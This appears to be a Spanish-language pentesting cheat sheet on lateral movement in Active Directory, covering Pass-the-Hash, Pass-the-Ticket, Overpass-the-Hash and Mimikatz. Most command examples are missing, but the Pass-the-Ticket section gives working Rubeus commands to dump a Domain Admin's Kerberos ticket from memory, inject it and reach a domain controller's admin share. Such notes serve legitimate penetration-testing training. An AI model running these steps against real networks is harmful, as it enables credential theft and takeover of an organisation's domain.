Lateral Movement (AD)¶
[!danger] GOAL: DOMAIN ADMIN Ya eres admin local en una máquina. Tienes hashes o tickets. ¿Cómo saltas a la siguiente?
1. Pass-the-Hash (PtH)¶
Usar el hash NTLM directamente. No hace falta crackearlo.
Requisito: Tener el hash NTLM (aad3b...:5fbc...). Normalmente el hash NTLM es la segunda parte (detrás de los dos puntos).
Lo más cómodo si el puerto 5985 (WinRM) está abierto.
Para comprobar validez en toda la red (/24).
Si ves "Pwn3d!" en verde, tienes acceso ADMIN.2. Pass-the-Ticket (PtT)¶
Usar tickets Kerberos (.kirbi o .ccache) robados de memoria.
Herramienta: Rubeus (Windows) o Mimikatz.
dump & Import (Rubeus)¶
Desde una sesión como Admin/SYSTEM:
# 1. Ver tickets en memoria
.\Rubeus.exe triage
# 2. Dumpear un ticket específico (ej: de un Domain Admin)
.\Rubeus.exe dump /luid:0x12345 /nowrap
# 3. Importar a tu sesión actual (Pass-the-Ticket)
.\Rubeus.exe ptt /ticket:<BASE64_TICKET_OR_FILE>
# 4. Verificar
klist
# Deberías ver el ticket extra. Ahora puedes acceder a recursos como ese usuario.
dir \\DC01\C$
3. Overpass-the-Hash¶
Convertir un Hash NTLM en un Ticket Kerberos (TGT). Útil cuando NTLM está deshabilitado o quieres persistencia vía Kerberos.
Esto pide un TGT usando el hash y lo inyecta (/ptt) en tu sesión.
4. Mimikatz (The Classic)¶
Si prefieres lo clásico.